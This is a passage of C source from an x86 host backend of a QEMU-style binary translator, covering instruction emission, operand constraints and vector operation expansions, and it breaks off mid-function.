tcg_out_setcond64(s, args[3], a0, a1, a2, const_a2); break; case INDEX_op_movcond_i64: tcg_out_movcond64(s, args[5], a0, a1, a2, const_a2, args[3]); break; case INDEX_op_bswap64_i64: tcg_out_bswap64(s, a0); break; case INDEX_op_extu_i32_i64: case INDEX_op_ext32u_i64: case INDEX_op_extrl_i64_i32: tcg_out_ext32u(s, a0, a1); break; case INDEX_op_ext_i32_i64: case INDEX_op_ext32s_i64: tcg_out_ext32s(s, a0, a1); break; case INDEX_op_extrh_i64_i32: tcg_out_shifti(s, SHIFT_SHR + P_REXW, a0, 32); break; #endif OP_32_64(deposit): if (args[3] == 0 && args[4] == 8) { /* load bits 0..7 */ tcg_out_modrm(s, OPC_MOVB_EvGv | P_REXB_R | P_REXB_RM, a2, a0); } else if (args[3] == 8 && args[4] == 8) { /* load bits 8..15 */ tcg_out_modrm(s, OPC_MOVB_EvGv, a2, a0 + 4); } else if (args[3] == 0 && args[4] == 16) { /* load bits 0..15 */ tcg_out_modrm(s, OPC_MOVL_EvGv | P_DATA16, a2, a0); } else { tcg_abort(); } break; case INDEX_op_extract_i64: if (a2 + args[3] == 32) { /* This is a 32-bit zero-extending right shift. */ tcg_out_mov(s, TCG_TYPE_I32, a0, a1); tcg_out_shifti(s, SHIFT_SHR, a0, a2); break; } /* FALLTHRU */ case INDEX_op_extract_i32: /* On the off-chance that we can use the high-byte registers. Otherwise we emit the same ext16 + shift pattern that we would have gotten from the normal tcg-op.c expansion. */ tcg_debug_assert(a2 == 8 && args[3] == 8); if (a1 < 4 && a0 < 8) { tcg_out_modrm(s, OPC_MOVZBL, a0, a1 + 4); } else { tcg_out_ext16u(s, a0, a1); tcg_out_shifti(s, SHIFT_SHR, a0, 8); } break; case INDEX_op_sextract_i32: /* We don't implement sextract_i64, as we cannot sign-extend to 64-bits without using the REX prefix that explicitly excludes access to the high-byte registers. */ tcg_debug_assert(a2 == 8 && args[3] == 8); if (a1 < 4 && a0 < 8) { tcg_out_modrm(s, OPC_MOVSBL, a0, a1 + 4); } else { tcg_out_ext16s(s, a0, a1, 0); tcg_out_shifti(s, SHIFT_SAR, a0, 8); } break; OP_32_64(extract2): /* Note that SHRD outputs to the r/m operand. */ tcg_out_modrm(s, OPC_SHRD_Ib + rexw, a2, a0); tcg_out8(s, args[3]); break; case INDEX_op_mb: tcg_out_mb(s, a0); break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ case INDEX_op_mov_i64: case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_movi_i64: case INDEX_op_call: /* Always emitted via tcg_out_call. 
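       Reaching any of these opcodes here would be a TCG bug,
       hence the abort below.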
*/ default: tcg_abort(); } #undef OP_32_64 } static void tcg_out_vec_op(TCGContext *s, TCGOpcode opc, unsigned vecl, unsigned vece, const TCGArg *args, const int *const_args) { static int const add_insn[4] = { OPC_PADDB, OPC_PADDW, OPC_PADDD, OPC_PADDQ }; static int const ssadd_insn[4] = { OPC_PADDSB, OPC_PADDSW, OPC_UD2, OPC_UD2 }; static int const usadd_insn[4] = { OPC_PADDUB, OPC_PADDUW, OPC_UD2, OPC_UD2 }; static int const sub_insn[4] = { OPC_PSUBB, OPC_PSUBW, OPC_PSUBD, OPC_PSUBQ }; static int const sssub_insn[4] = { OPC_PSUBSB, OPC_PSUBSW, OPC_UD2, OPC_UD2 }; static int const ussub_insn[4] = { OPC_PSUBUB, OPC_PSUBUW, OPC_UD2, OPC_UD2 }; static int const mul_insn[4] = { OPC_UD2, OPC_PMULLW, OPC_PMULLD, OPC_UD2 }; static int const shift_imm_insn[4] = { OPC_UD2, OPC_PSHIFTW_Ib, OPC_PSHIFTD_Ib, OPC_PSHIFTQ_Ib }; static int const cmpeq_insn[4] = { OPC_PCMPEQB, OPC_PCMPEQW, OPC_PCMPEQD, OPC_PCMPEQQ }; static int const cmpgt_insn[4] = { OPC_PCMPGTB, OPC_PCMPGTW, OPC_PCMPGTD, OPC_PCMPGTQ }; static int const punpckl_insn[4] = { OPC_PUNPCKLBW, OPC_PUNPCKLWD, OPC_PUNPCKLDQ, OPC_PUNPCKLQDQ }; static int const punpckh_insn[4] = { OPC_PUNPCKHBW, OPC_PUNPCKHWD, OPC_PUNPCKHDQ, OPC_PUNPCKHQDQ }; static int const packss_insn[4] = { OPC_PACKSSWB, OPC_PACKSSDW, OPC_UD2, OPC_UD2 }; static int const packus_insn[4] = { OPC_PACKUSWB, OPC_PACKUSDW, OPC_UD2, OPC_UD2 }; static int const smin_insn[4] = { OPC_PMINSB, OPC_PMINSW, OPC_PMINSD, OPC_UD2 }; static int const smax_insn[4] = { OPC_PMAXSB, OPC_PMAXSW, OPC_PMAXSD, OPC_UD2 }; static int const umin_insn[4] = { OPC_PMINUB, OPC_PMINUW, OPC_PMINUD, OPC_UD2 }; static int const umax_insn[4] = { OPC_PMAXUB, OPC_PMAXUW, OPC_PMAXUD, OPC_UD2 }; static int const shlv_insn[4] = { /* TODO: AVX512 adds support for MO_16. */ OPC_UD2, OPC_UD2, OPC_VPSLLVD, OPC_VPSLLVQ }; static int const shrv_insn[4] = { /* TODO: AVX512 adds support for MO_16. */ OPC_UD2, OPC_UD2, OPC_VPSRLVD, OPC_VPSRLVQ }; static int const sarv_insn[4] = { /* TODO: AVX512 adds support for MO_16, MO_64. */ OPC_UD2, OPC_UD2, OPC_VPSRAVD, OPC_UD2 }; static int const shls_insn[4] = { OPC_UD2, OPC_PSLLW, OPC_PSLLD, OPC_PSLLQ }; static int const shrs_insn[4] = { OPC_UD2, OPC_PSRLW, OPC_PSRLD, OPC_PSRLQ }; static int const sars_insn[4] = { OPC_UD2, OPC_PSRAW, OPC_PSRAD, OPC_UD2 }; static int const abs_insn[4] = { /* TODO: AVX512 adds support for MO_64. 
*/ OPC_PABSB, OPC_PABSW, OPC_PABSD, OPC_UD2 }; TCGType type = vecl + TCG_TYPE_V64; int insn = 0, sub; TCGArg a0, a1, a2; a0 = args[0]; a1 = args[1]; a2 = args[2]; switch (opc) { case INDEX_op_add_vec: insn = add_insn[vece]; goto gen_simd; case INDEX_op_ssadd_vec: insn = ssadd_insn[vece]; goto gen_simd; case INDEX_op_usadd_vec: insn = usadd_insn[vece]; goto gen_simd; case INDEX_op_sub_vec: insn = sub_insn[vece]; goto gen_simd; case INDEX_op_sssub_vec: insn = sssub_insn[vece]; goto gen_simd; case INDEX_op_ussub_vec: insn = ussub_insn[vece]; goto gen_simd; case INDEX_op_mul_vec: insn = mul_insn[vece]; goto gen_simd; case INDEX_op_and_vec: insn = OPC_PAND; goto gen_simd; case INDEX_op_or_vec: insn = OPC_POR; goto gen_simd; case INDEX_op_xor_vec: insn = OPC_PXOR; goto gen_simd; case INDEX_op_smin_vec: insn = smin_insn[vece]; goto gen_simd; case INDEX_op_umin_vec: insn = umin_insn[vece]; goto gen_simd; case INDEX_op_smax_vec: insn = smax_insn[vece]; goto gen_simd; case INDEX_op_umax_vec: insn = umax_insn[vece]; goto gen_simd; case INDEX_op_shlv_vec: insn = shlv_insn[vece]; goto gen_simd; case INDEX_op_shrv_vec: insn = shrv_insn[vece]; goto gen_simd; case INDEX_op_sarv_vec: insn = sarv_insn[vece]; goto gen_simd; case INDEX_op_shls_vec: insn = shls_insn[vece]; goto gen_simd; case INDEX_op_shrs_vec: insn = shrs_insn[vece]; goto gen_simd; case INDEX_op_sars_vec: insn = sars_insn[vece]; goto gen_simd; case INDEX_op_x86_punpckl_vec: insn = punpckl_insn[vece]; goto gen_simd; case INDEX_op_x86_punpckh_vec: insn = punpckh_insn[vece]; goto gen_simd; case INDEX_op_x86_packss_vec: insn = packss_insn[vece]; goto gen_simd; case INDEX_op_x86_packus_vec: insn = packus_insn[vece]; goto gen_simd; #if TCG_TARGET_REG_BITS == 32 case INDEX_op_dup2_vec: /* First merge the two 32-bit inputs to a single 64-bit element. */ tcg_out_vex_modrm(s, OPC_PUNPCKLDQ, a0, a1, a2); /* Then replicate the 64-bit elements across the rest of the vector. */ if (type != TCG_TYPE_V64) { tcg_out_dup_vec(s, type, MO_64, a0, a0); } break; #endif case INDEX_op_abs_vec: insn = abs_insn[vece]; a2 = a1; a1 = 0; goto gen_simd; gen_simd: tcg_debug_assert(insn != OPC_UD2); if (type == TCG_TYPE_V256) { insn |= P_VEXL; } tcg_out_vex_modrm(s, insn, a0, a1, a2); break; case INDEX_op_cmp_vec: sub = args[3]; if (sub == TCG_COND_EQ) { insn = cmpeq_insn[vece]; } else if (sub == TCG_COND_GT) { insn = cmpgt_insn[vece]; } else { g_assert_not_reached(); } goto gen_simd; case INDEX_op_andc_vec: insn = OPC_PANDN; if (type == TCG_TYPE_V256) { insn |= P_VEXL; } tcg_out_vex_modrm(s, insn, a0, a2, a1); break; case INDEX_op_shli_vec: sub = 6; goto gen_shift; case INDEX_op_shri_vec: sub = 2; goto gen_shift; case INDEX_op_sari_vec: tcg_debug_assert(vece != MO_64); sub = 4; gen_shift: tcg_debug_assert(vece != MO_8); insn = shift_imm_insn[vece]; if (type == TCG_TYPE_V256) { insn |= P_VEXL; } tcg_out_vex_modrm(s, insn, sub, a0, a1); tcg_out8(s, a2); break; case INDEX_op_ld_vec: tcg_out_ld(s, type, a0, a1, a2); break; case INDEX_op_st_vec: tcg_out_st(s, type, a0, a1, a2); break; case INDEX_op_dupm_vec: tcg_out_dupm_vec(s, type, vece, a0, a1, a2); break; case INDEX_op_x86_shufps_vec: insn = OPC_SHUFPS; sub = args[3]; goto gen_simd_imm8; case INDEX_op_x86_blend_vec: if (vece == MO_16) { insn = OPC_PBLENDW; } else if (vece == MO_32) { insn = (have_avx2 ? 
OPC_VPBLENDD : OPC_BLENDPS); } else { g_assert_not_reached(); } sub = args[3]; goto gen_simd_imm8; case INDEX_op_x86_vperm2i128_vec: insn = OPC_VPERM2I128; sub = args[3]; goto gen_simd_imm8; gen_simd_imm8: if (type == TCG_TYPE_V256) { insn |= P_VEXL; } tcg_out_vex_modrm(s, insn, a0, a1, a2); tcg_out8(s, sub); break; case INDEX_op_x86_vpblendvb_vec: insn = OPC_VPBLENDVB; if (type == TCG_TYPE_V256) { insn |= P_VEXL; } tcg_out_vex_modrm(s, insn, a0, a1, a2); tcg_out8(s, args[3] << 4); break; case INDEX_op_x86_psrldq_vec: tcg_out_vex_modrm(s, OPC_GRP14, 3, a0, a1); tcg_out8(s, a2); break; case INDEX_op_mov_vec: /* Always emitted via tcg_out_mov. */ case INDEX_op_dupi_vec: /* Always emitted via tcg_out_movi. */ case INDEX_op_dup_vec: /* Always emitted via tcg_out_dup_vec. */ default: g_assert_not_reached(); } } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef ri_r = { .args_ct_str = { "ri", "r" } }; static const TCGTargetOpDef re_r = { .args_ct_str = { "re", "r" } }; static const TCGTargetOpDef qi_r = { .args_ct_str = { "qi", "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef r_q = { .args_ct_str = { "r", "q" } }; static const TCGTargetOpDef r_re = { .args_ct_str = { "r", "re" } }; static const TCGTargetOpDef r_0 = { .args_ct_str = { "r", "0" } }; static const TCGTargetOpDef r_r_ri = { .args_ct_str = { "r", "r", "ri" } }; static const TCGTargetOpDef r_r_re = { .args_ct_str = { "r", "r", "re" } }; static const TCGTargetOpDef r_0_r = { .args_ct_str = { "r", "0", "r" } }; static const TCGTargetOpDef r_0_re = { .args_ct_str = { "r", "0", "re" } }; static const TCGTargetOpDef r_0_ci = { .args_ct_str = { "r", "0", "ci" } }; static const TCGTargetOpDef r_L = { .args_ct_str = { "r", "L" } }; static const TCGTargetOpDef L_L = { .args_ct_str = { "L", "L" } }; static const TCGTargetOpDef r_L_L = { .args_ct_str = { "r", "L", "L" } }; static const TCGTargetOpDef r_r_L = { .args_ct_str = { "r", "r", "L" } }; static const TCGTargetOpDef L_L_L = { .args_ct_str = { "L", "L", "L" } }; static const TCGTargetOpDef r_r_L_L = { .args_ct_str = { "r", "r", "L", "L" } }; static const TCGTargetOpDef L_L_L_L = { .args_ct_str = { "L", "L", "L", "L" } }; static const TCGTargetOpDef x_x = { .args_ct_str = { "x", "x" } }; static const TCGTargetOpDef x_x_x = { .args_ct_str = { "x", "x", "x" } }; static const TCGTargetOpDef x_x_x_x = { .args_ct_str = { "x", "x", "x", "x" } }; static const TCGTargetOpDef x_r = { .args_ct_str = { "x", "r" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8u_i64: case INDEX_op_ld8s_i32: case INDEX_op_ld8s_i64: case INDEX_op_ld16u_i32: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i32: case INDEX_op_ld16s_i64: case INDEX_op_ld_i32: case INDEX_op_ld32u_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld_i64: return &r_r; case INDEX_op_st8_i32: case INDEX_op_st8_i64: return &qi_r; case INDEX_op_st16_i32: case INDEX_op_st16_i64: case INDEX_op_st_i32: case INDEX_op_st32_i64: return &ri_r; case INDEX_op_st_i64: return &re_r; case INDEX_op_add_i32: case INDEX_op_add_i64: return &r_r_re; case INDEX_op_sub_i32: case INDEX_op_sub_i64: case INDEX_op_mul_i32: case INDEX_op_mul_i64: case INDEX_op_or_i32: case INDEX_op_or_i64: case INDEX_op_xor_i32: case INDEX_op_xor_i64: return &r_0_re; case INDEX_op_and_i32: case INDEX_op_and_i64: { static const TCGTargetOpDef and = { .args_ct_str = { "r", "0", "reZ" } }; return &and; }
break; case INDEX_op_andc_i32: case INDEX_op_andc_i64: { static const TCGTargetOpDef andc = { .args_ct_str = { "r", "r", "rI" } }; return &andc; } break; case INDEX_op_shl_i32: case INDEX_op_shl_i64: case INDEX_op_shr_i32: case INDEX_op_shr_i64: case INDEX_op_sar_i32: case INDEX_op_sar_i64: return have_bmi2 ? &r_r_ri : &r_0_ci; case INDEX_op_rotl_i32: case INDEX_op_rotl_i64: case INDEX_op_rotr_i32: case INDEX_op_rotr_i64: return &r_0_ci; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: return &r_re; case INDEX_op_bswap16_i32: case INDEX_op_bswap16_i64: case INDEX_op_bswap32_i32: case INDEX_op_bswap32_i64: case INDEX_op_bswap64_i64: case INDEX_op_neg_i32: case INDEX_op_neg_i64: case INDEX_op_not_i32: case INDEX_op_not_i64: case INDEX_op_extrh_i64_i32: return &r_0; case INDEX_op_ext8s_i32: case INDEX_op_ext8s_i64: case INDEX_op_ext8u_i32: case INDEX_op_ext8u_i64: return &r_q; case INDEX_op_ext16s_i32: case INDEX_op_ext16s_i64: case INDEX_op_ext16u_i32: case INDEX_op_ext16u_i64: case INDEX_op_ext32s_i64: case INDEX_op_ext32u_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: case INDEX_op_extrl_i64_i32: case INDEX_op_extract_i32: case INDEX_op_extract_i64: case INDEX_op_sextract_i32: case INDEX_op_ctpop_i32: case INDEX_op_ctpop_i64: return &r_r; case INDEX_op_extract2_i32: case INDEX_op_extract2_i64: return &r_0_r; case INDEX_op_deposit_i32: case INDEX_op_deposit_i64: { static const TCGTargetOpDef dep = { .args_ct_str = { "Q", "0", "Q" } }; return &dep; } case INDEX_op_setcond_i32: case INDEX_op_setcond_i64: { static const TCGTargetOpDef setc = { .args_ct_str = { "q", "r", "re" } }; return &setc; } case INDEX_op_movcond_i32: case INDEX_op_movcond_i64: { static const TCGTargetOpDef movc = { .args_ct_str = { "r", "r", "re", "r", "0" } }; return &movc; } case INDEX_op_div2_i32: case INDEX_op_div2_i64: case INDEX_op_divu2_i32: case INDEX_op_divu2_i64: { static const TCGTargetOpDef div2 = { .args_ct_str = { "a", "d", "0", "1", "r" } }; return &div2; } case INDEX_op_mulu2_i32: case INDEX_op_mulu2_i64: case INDEX_op_muls2_i32: case INDEX_op_muls2_i64: { static const TCGTargetOpDef mul2 = { .args_ct_str = { "a", "d", "a", "r" } }; return &mul2; } case INDEX_op_add2_i32: case INDEX_op_add2_i64: case INDEX_op_sub2_i32: case INDEX_op_sub2_i64: { static const TCGTargetOpDef arith2 = { .args_ct_str = { "r", "r", "0", "1", "re", "re" } }; return &arith2; } case INDEX_op_ctz_i32: case INDEX_op_ctz_i64: { static const TCGTargetOpDef ctz[2] = { { .args_ct_str = { "&r", "r", "r" } }, { .args_ct_str = { "&r", "r", "rW" } }, }; return &ctz[have_bmi1]; } case INDEX_op_clz_i32: case INDEX_op_clz_i64: { static const TCGTargetOpDef clz[2] = { { .args_ct_str = { "&r", "r", "r" } }, { .args_ct_str = { "&r", "r", "rW" } }, }; return &clz[have_lzcnt]; } case INDEX_op_qemu_ld_i32: return TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? &r_L : &r_L_L; case INDEX_op_qemu_st_i32: return TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? &L_L : &L_L_L; case INDEX_op_qemu_ld_i64: return (TCG_TARGET_REG_BITS == 64 ? &r_L : TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? &r_r_L : &r_r_L_L); case INDEX_op_qemu_st_i64: return (TCG_TARGET_REG_BITS == 64 ? &L_L : TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? 
&L_L_L : &L_L_L_L); case INDEX_op_brcond2_i32: { static const TCGTargetOpDef b2 = { .args_ct_str = { "r", "r", "ri", "ri" } }; return &b2; } case INDEX_op_setcond2_i32: { static const TCGTargetOpDef s2 = { .args_ct_str = { "r", "r", "r", "ri", "ri" } }; return &s2; } case INDEX_op_ld_vec: case INDEX_op_st_vec: case INDEX_op_dupm_vec: return &x_r; case INDEX_op_add_vec: case INDEX_op_sub_vec: case INDEX_op_mul_vec: case INDEX_op_and_vec: case INDEX_op_or_vec: case INDEX_op_xor_vec: case INDEX_op_andc_vec: case INDEX_op_ssadd_vec: case INDEX_op_usadd_vec: case INDEX_op_sssub_vec: case INDEX_op_ussub_vec: case INDEX_op_smin_vec: case INDEX_op_umin_vec: case INDEX_op_smax_vec: case INDEX_op_umax_vec: case INDEX_op_shlv_vec: case INDEX_op_shrv_vec: case INDEX_op_sarv_vec: case INDEX_op_shls_vec: case INDEX_op_shrs_vec: case INDEX_op_sars_vec: case INDEX_op_cmp_vec: case INDEX_op_x86_shufps_vec: case INDEX_op_x86_blend_vec: case INDEX_op_x86_packss_vec: case INDEX_op_x86_packus_vec: case INDEX_op_x86_vperm2i128_vec: case INDEX_op_x86_punpckl_vec: case INDEX_op_x86_punpckh_vec: #if TCG_TARGET_REG_BITS == 32 case INDEX_op_dup2_vec: #endif return &x_x_x; case INDEX_op_abs_vec: case INDEX_op_dup_vec: case INDEX_op_shli_vec: case INDEX_op_shri_vec: case INDEX_op_sari_vec: case INDEX_op_x86_psrldq_vec: return &x_x; case INDEX_op_x86_vpblendvb_vec: return &x_x_x_x; default: break; } return NULL; } int tcg_can_emit_vec_op(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece) { switch (opc) { case INDEX_op_add_vec: case INDEX_op_sub_vec: case INDEX_op_and_vec: case INDEX_op_or_vec: case INDEX_op_xor_vec: case INDEX_op_andc_vec: return 1; case INDEX_op_cmp_vec: case INDEX_op_cmpsel_vec: return -1; case INDEX_op_shli_vec: case INDEX_op_shri_vec: /* We must expand the operation for MO_8. */ return vece == MO_8 ? -1 : 1; case INDEX_op_sari_vec: /* We must expand the operation for MO_8. */ if (vece == MO_8) { return -1; } /* We can emulate this for MO_64, but it does not pay off unless we're producing at least 4 values. */ if (vece == MO_64) { return type >= TCG_TYPE_V256 ? -1 : 0; } return 1; case INDEX_op_shls_vec: case INDEX_op_shrs_vec: return vece >= MO_16; case INDEX_op_sars_vec: return vece >= MO_16 && vece <= MO_32; case INDEX_op_shlv_vec: case INDEX_op_shrv_vec: return have_avx2 && vece >= MO_32; case INDEX_op_sarv_vec: return have_avx2 && vece == MO_32; case INDEX_op_mul_vec: if (vece == MO_8) { /* We can expand the operation for MO_8. */ return -1; } if (vece == MO_64) { return 0; } return 1; case INDEX_op_ssadd_vec: case INDEX_op_usadd_vec: case INDEX_op_sssub_vec: case INDEX_op_ussub_vec: return vece <= MO_16; case INDEX_op_smin_vec: case INDEX_op_smax_vec: case INDEX_op_umin_vec: case INDEX_op_umax_vec: case INDEX_op_abs_vec: return vece <= MO_32; default: return 0; } } static void expand_vec_shi(TCGContext *tcg_ctx, TCGType type, unsigned vece, bool shr, TCGv_vec v0, TCGv_vec v1, TCGArg imm) { TCGv_vec t1, t2; tcg_debug_assert(vece == MO_8); t1 = tcg_temp_new_vec(tcg_ctx, type); t2 = tcg_temp_new_vec(tcg_ctx, type); /* Unpack to W, shift, and repack. Tricky bits: (1) Use punpck*bw x,x to produce DDCCBBAA, i.e. duplicate in other half of the 16-bit lane. (2) For right-shift, add 8 so that the high half of the lane becomes zero. For left-shift, we must shift up and down again. (3) Step 2 leaves high half zero such that PACKUSWB (pack with unsigned saturation) does not modify the quantity. 
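       Sketch for one byte lane: punpck*bw x,x turns byte A into the
       16-bit value (A << 8) | A; shifting that right by imm+8 leaves
       A >> imm zero-extended in the low byte, which PACKUSWB then
       packs back down to a byte unchanged.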
*/ vec_gen_3(tcg_ctx, INDEX_op_x86_punpckl_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v1)); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckh_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t2), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v1)); if (shr) { tcg_gen_shri_vec(tcg_ctx, MO_16, t1, t1, imm + 8); tcg_gen_shri_vec(tcg_ctx, MO_16, t2, t2, imm + 8); } else { tcg_gen_shli_vec(tcg_ctx, MO_16, t1, t1, imm + 8); tcg_gen_shli_vec(tcg_ctx, MO_16, t2, t2, imm + 8); tcg_gen_shri_vec(tcg_ctx, MO_16, t1, t1, 8); tcg_gen_shri_vec(tcg_ctx, MO_16, t2, t2, 8); } vec_gen_3(tcg_ctx, INDEX_op_x86_packus_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t2)); tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t2); } static void expand_vec_sari(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec v1, TCGArg imm) { TCGv_vec t1, t2; switch (vece) { case MO_8: /* Unpack to W, shift, and repack, as in expand_vec_shi. */ t1 = tcg_temp_new_vec(tcg_ctx, type); t2 = tcg_temp_new_vec(tcg_ctx, type); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckl_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v1)); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckh_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t2), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v1)); tcg_gen_sari_vec(tcg_ctx, MO_16, t1, t1, imm + 8); tcg_gen_sari_vec(tcg_ctx, MO_16, t2, t2, imm + 8); vec_gen_3(tcg_ctx, INDEX_op_x86_packss_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t2)); tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t2); break; case MO_64: if (imm <= 32) { /* * We can emulate a small sign extend by performing an arithmetic * 32-bit shift and overwriting the high half of a 64-bit logical * shift. Note that the ISA says shift of 32 is valid, but TCG * does not, so we have to bound the smaller shift -- we get the * same result in the high half either way. */ t1 = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_sari_vec(tcg_ctx, MO_32, t1, v1, MIN(imm, 31)); tcg_gen_shri_vec(tcg_ctx, MO_64, v0, v1, imm); vec_gen_4(tcg_ctx, INDEX_op_x86_blend_vec, type, MO_32, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, t1), 0xaa); tcg_temp_free_vec(tcg_ctx, t1); } else { /* Otherwise we will need to use a compare vs 0 to produce * the sign-extend, shift and merge. */ t1 = tcg_const_zeros_vec(tcg_ctx, type); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_GT, MO_64, t1, t1, v1); tcg_gen_shri_vec(tcg_ctx, MO_64, v0, v1, imm); tcg_gen_shli_vec(tcg_ctx, MO_64, t1, t1, 64 - imm); tcg_gen_or_vec(tcg_ctx, MO_64, v0, v0, t1); tcg_temp_free_vec(tcg_ctx, t1); } break; default: g_assert_not_reached(); } } static void expand_vec_mul(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec v1, TCGv_vec v2) { TCGv_vec t1, t2, t3, t4; tcg_debug_assert(vece == MO_8); /* * Unpack v1 bytes to words, 0 | x. * Unpack v2 bytes to words, y | 0. * This leaves the 8-bit result, x * y, with 8 bits of right padding. * Shift logical right by 8 bits to clear the high 8 bytes before * using an unsigned saturated pack. * * The difference between the V64, V128 and V256 cases is merely how * we distribute the expansion between temporaries. 
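     * For instance, within one 16-bit lane the product is
     * x * (y << 8) == (x * y) << 8 modulo 2^16, so after the logical
     * shift right by 8 the low byte holds x * y truncated to 8 bits,
     * already zero-extended and ready for the saturated pack.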
*/ switch (type) { case TCG_TYPE_V64: t1 = tcg_temp_new_vec(tcg_ctx, TCG_TYPE_V128); t2 = tcg_temp_new_vec(tcg_ctx, TCG_TYPE_V128); tcg_gen_dup16i_vec(tcg_ctx, t2, 0); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckl_vec, TCG_TYPE_V128, MO_8, tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, t2)); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckl_vec, TCG_TYPE_V128, MO_8, tcgv_vec_arg(tcg_ctx, t2), tcgv_vec_arg(tcg_ctx, t2), tcgv_vec_arg(tcg_ctx, v2)); tcg_gen_mul_vec(tcg_ctx, MO_16, t1, t1, t2); tcg_gen_shri_vec(tcg_ctx, MO_16, t1, t1, 8); vec_gen_3(tcg_ctx, INDEX_op_x86_packus_vec, TCG_TYPE_V128, MO_8, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t1)); tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t2); break; case TCG_TYPE_V128: case TCG_TYPE_V256: t1 = tcg_temp_new_vec(tcg_ctx, type); t2 = tcg_temp_new_vec(tcg_ctx, type); t3 = tcg_temp_new_vec(tcg_ctx, type); t4 = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_dup16i_vec(tcg_ctx, t4, 0); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckl_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, t4)); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckl_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t2), tcgv_vec_arg(tcg_ctx, t4), tcgv_vec_arg(tcg_ctx, v2)); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckh_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t3), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, t4)); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckh_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t4), tcgv_vec_arg(tcg_ctx, t4), tcgv_vec_arg(tcg_ctx, v2)); tcg_gen_mul_vec(tcg_ctx, MO_16, t1, t1, t2); tcg_gen_mul_vec(tcg_ctx, MO_16, t3, t3, t4); tcg_gen_shri_vec(tcg_ctx, MO_16, t1, t1, 8); tcg_gen_shri_vec(tcg_ctx, MO_16, t3, t3, 8); vec_gen_3(tcg_ctx, INDEX_op_x86_packus_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t3)); tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t2); tcg_temp_free_vec(tcg_ctx, t3); tcg_temp_free_vec(tcg_ctx, t4); break; default: g_assert_not_reached(); } } static bool expand_vec_cmp_noinv(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec v1, TCGv_vec v2, TCGCond cond) { enum { NEED_INV = 1, NEED_SWAP = 2, NEED_BIAS = 4, NEED_UMIN = 8, NEED_UMAX = 16, }; TCGv_vec t1, t2; uint8_t fixup = 0; switch (cond) { case TCG_COND_EQ: case TCG_COND_GT: fixup = 0; break; case TCG_COND_NE: case TCG_COND_LE: fixup = NEED_INV; break; case TCG_COND_LT: fixup = NEED_SWAP; break; case TCG_COND_GE: fixup = NEED_SWAP | NEED_INV; break; case TCG_COND_LEU: if (vece <= MO_32) { fixup = NEED_UMIN; } else { fixup = NEED_BIAS | NEED_INV; } break; case TCG_COND_GTU: if (vece <= MO_32) { fixup = NEED_UMIN | NEED_INV; } else { fixup = NEED_BIAS; } break; case TCG_COND_GEU: if (vece <= MO_32) { fixup = NEED_UMAX; } else { fixup = NEED_BIAS | NEED_SWAP | NEED_INV; } break; case TCG_COND_LTU: if (vece <= MO_32) { fixup = 